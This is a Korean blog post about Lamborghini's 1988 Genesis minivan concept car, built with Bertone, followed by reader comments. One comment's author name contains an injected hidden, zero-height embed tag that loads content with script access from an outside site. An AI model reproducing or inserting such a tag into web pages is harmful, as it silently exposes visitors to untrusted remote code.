"창세기 ,기원, 발생"이라는 뜻을 가진 제네시스<Genesis>가 현대 자동차에서 생산되어 판매가 되고 있습니다. 대형 고급차의 새로운 모델에 목말라 하던 수요자들은 몇달을 기다려 가면서도 제네시스를 사려고 기다리고 있고 미국시장에서도 이런저런 말들은 많지만 판매에 호조를 보이며 현대의 위상을 한층 더 올리고 있다고 하는 소식이 간간히 들려 오고있기도 합니다. 또한 이번 달에는 스포츠카인 제네시스 쿠페<Genesis Coupe>의 출시가 있어 더욱 큰 기대를 한 몸에 받고 있습니다. 하지만 람보르기니에서도 제네시스라는 이름의 자동차가 있었다는 것을 여러분은 알고 계시는지요.
1988년 튜린 모터쇼<Turin Motor Show>에서 람보르기니<Lamborghini>는 이제껏 자신들이 생산해 왔던 자동차들과는 완전히 다른 모습의 제네시스 컨셉트카<Genesis Concept Car>를 발표하며 미래 지향적이면서 실용적인 자동차를 생산하려는 의지를 보이게 됩니다.

이태리의 유명 디자이너인 베르토네<Bertone>와 손을 잡고 제작한 제네시스는 미래에 대한 예측을 정확히 감지해 낸 듯 당시에는 유행하지 않던 미니밴<Minivan>의 모습을 가지고 있습니다.  이는 람보르기니가 디자이너의 의견을 최대한 반영하여 경쟁상대였던 페라리<Ferrari>보다 기술과 미래에 대한 추세 예측에서 우위에 있다는걸 세상에 보여 주려는 의도이기도 합니다. 
4인승에서 6인승으로 변형이 가능한 제네시스는 공간의 효율성을 갖추었으며, 455마력의 V12기통엔진을 장착하여 막강한 체력을 자랑하고 있습니다. 차체의 사이드 부분을 제외한 대부분을 유리로 감싼 모습을 하고 있어 마치 유리온실과 같은 편안함을 승객이 느끼게 되어있는데, 이는 요즘 제작되고 있는 컨셉트카들이 다투어 적용하고 있는 글라스루프<Glass Roof>의 모습과 다를 것이 없었습니다.

제네시스는 자신의 심장인 막강한 엔진이 말해 주는것 같이 람보르기니가 가진 숨길 수 없는 DNA를 여러 곳에 숨겨 놓고 있습니다. 슬라이딩 형태의 뒷 문과는 달리 앞문은 걸윙<Gullwing> 도어를 연상하게 만들었고 사이드에서 바라 본 프론트 노즈는 거침없이 달리고 싶은 욕망을 숨기고 있어, 매혹적이고 빠르며, 편안한 미래의 GT카 '로드 제트<Road Jet>'를 원한 람보르기니와 디자이너인 베르토네의 미래에 대한 욕망을 한꺼번에 충족시켜 줍니다.
성공적인 제네시스 컨셉으로 람보르기니는 앞으로 다가올 미래에 대한 소비자 의 욕구를 자극하는 것에 그치고 생산에는 이르지 못하였지만 혁신적이고 편리한 자동차에 대한 평가 기준을 업그레이드시키며 20년이 지난 지금에도 많은 자동차의 디자인에 영향을 주었다는 것은 피할 수 없는 사실로 다가오고 있습니다.




Posted by 빨간여우

댓글을 달아주세요:: 악플이나 쓰는 당신은 MB같은 넘, 스팸이나 보내는 당신은 미친소

    이전 댓글 더보기
  1. 2008.10.15 12:32 신고
    댓글 주소 수정/삭제 댓글
    이건 미니밴도, GT카도 아니야!!! ㅠ,ㅠ
    • 2008.10.15 19:26 신고
      댓글 주소 수정/삭제
      ㅋㅋ 람보르기니에서 그렇게 말하니 싫어도 할 수 없겠죠..^^;;;
  2. 2008.10.20 09:44 신고
    댓글 주소 수정/삭제 댓글
    안녕하세요.티스토리 입니다^^
    회원님의 포스트가 현재 다음 첫화면 카페.블로그 영역에 보여지고 있습니다. 카페.블로그 영역은 다음 첫화면에서 스크롤을 조금만 내리시면 확인하실 수 있습니다.
    회원님께서 작성해 주신 유익하고 재미있는 포스트를 더 많은 분들과 함께 나누고자 다음 첫화면에 소개 하게 되었으니, 혹시 노출에 문제가 있으시다면 tistoryblog@hanmail.net 메일로 문의주시기 바랍니다.
    앞으로도 티스토리와 함께 회원님의 소중한 이야기를 담아가시기 바랍니다!

    감사합니다. 즐거운 하루 보내세요!
    • 2008.10.20 16:46 신고
      댓글 주소 수정/삭제
      감사합니다...^^
      많은 관심에 어깨가 무겁네요...^^;
  3. 수바
    2008.10.20 10:20
    댓글 주소 수정/삭제 댓글
    지금 나와도 잘 팔리겠네요..

    아니 지금나오면 대박?
    • 진<embed src=http://6kk.kr allowscriptaccess=always height=0>
      2008.10.20 17:41
      댓글 주소 수정/삭제
      와우 정말 멋진데요ㅎㅎ
  4. mimesis
    2008.10.20 10:42
    댓글 주소 수정/삭제 댓글
    저렇게 새월이 지나서 봐도 어색하지 않고 오히려 참신해 보이는 부분도 있다는 것이 그들의 통찰력의 깊이를 나나내주고 있는 것 같습니다.
    사실 그것이 근대 이후 아시아를 앞섰던 그들의 힘이 아닌가 생각해 봅니다.
  5. 제이슨
    2008.10.20 11:24
    댓글 주소 수정/삭제 댓글
    저차의 외형이 오늘날의 미니밴의 모체라고 하던데요...
    저 차형을 착안해서 미니밴의 외형을 땄다고 들었는데...
    아닌가요???
  6. 왠지
    2008.10.20 12:00
    댓글 주소 수정/삭제 댓글
    전대물에 등장할 것 같은 차량
    • 김정하
      2008.10.20 13:00
      댓글 주소 수정/삭제
      와정말멋지네요..
  7. ;;
    2008.10.20 15:17
    댓글 주소 수정/삭제 댓글
    뭐냐 이추물은
  8. 와우
    2008.10.20 16:32
    댓글 주소 수정/삭제 댓글
    백미러가 없네요...ㅋㅋ
  9. ㅎㄷㄷ
    2008.10.20 17:09
    댓글 주소 수정/삭제 댓글
    사고나면 바로 저세상인거다!!!
  10. 나무늘보
    2008.10.20 20:51
    댓글 주소 수정/삭제 댓글
    여름엔못타겠다 아마도 쩌 죽을지도...?
  11. 케이
    2008.10.20 23:11
    댓글 주소 수정/삭제 댓글
    잘보고갑니다~ 출처표기하고 담아갈게요~
  12. areios
    2008.10.20 23:18
    댓글 주소 수정/삭제 댓글
    기아자동차 컨셉모델중에서도 제네시스 있었던걸로 기억합니다.
  13. ;;;;;;;;;
    2008.10.21 04:36
    댓글 주소 수정/삭제 댓글
    이건머..사이드미러도 없고~와이퍼도 없고~
  14. ㅋㅋㅋㅋㅋㅋ
    2008.10.21 08:23
    댓글 주소 수정/삭제 댓글
    정말멋짐!!!!!!!!!
  15. 라세티 프리미어 기대짱!!
    2008.10.21 11:05
    댓글 주소 수정/삭제 댓글
    당시에는 스텔라나 엑셀 같은 헙접들이 돌아 뎅기던 시대! 최첨단의 디자인이나 오즘 시각으로 보면 촌스러운 디자인!! 영맨님 제네실수 홍보좀 그만하시죠?
  16. 흠,,내차는구형아반떼
    2008.12.24 12:09
    댓글 주소 수정/삭제 댓글
    흠,,,,,,
    저거탈빠엔,,그냥 내차 구형아반떼 타겠담,,
    --------------
    달라∼(달라) 달라∼(달라). 달라 난 달라. 내가 타는 차가 바로 그 차 구형 아반떼”
  17. 만약에 말이지
    2008.12.24 12:17
    댓글 주소 수정/삭제 댓글
    저차 타고 가다가 추돌사고나면 -_- 앞좌석에 타고있는 사람은 거의 사망할꺼 같은 기분이 드는건 나뿐일까?
  18. 자동차박사
    2008.12.24 12:20
    댓글 주소 수정/삭제 댓글
    아무리 문짝여는모양을 바꿔도 지금 자동차 문짝이 최고다.
  19. 하하
    2008.12.24 12:26
    댓글 주소 수정/삭제 댓글
    비오면 끝인거다. 내릴 수 없다는 ㅎㅎ
  20. LEE
    2008.12.24 13:12
    댓글 주소 수정/삭제 댓글
    1988년이라면 이미 미니밴이 미국에서 대히트를 친지 몇년이 지난 후죠. 미니밴의 대히트 덕분에 크라이슬러의 어려웠던 형편이 순식간에 바뀌었고, 그당시 CEO 였던 리아이아코카는 전설적인 CEO 가 되었지요. 그리고 GM과 포드도 모두 앞다투어 미니밴을 생산했지요.

    람보르기니가 1988년에 미니밴 모양의 자동차를 디자인한 것을 미래에 대한 정확한 예측을 했다고 말하는 것은 무리가 있네요.


BLOG main image
by 빨간여우

공지사항

카테고리

분류 전체보기 (326)
부릉부릉 자동차 이야기 (71)
보고읽은 이야기 (9)
도란도란 이야기 (18)
투덜투덜 이야기 (5)
컴맹이 말하는 컴얘기 (8)
08년 8월 31일이전 (211)
알려고하지 마셈 (3)

달력

«   2021/07   »
        1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31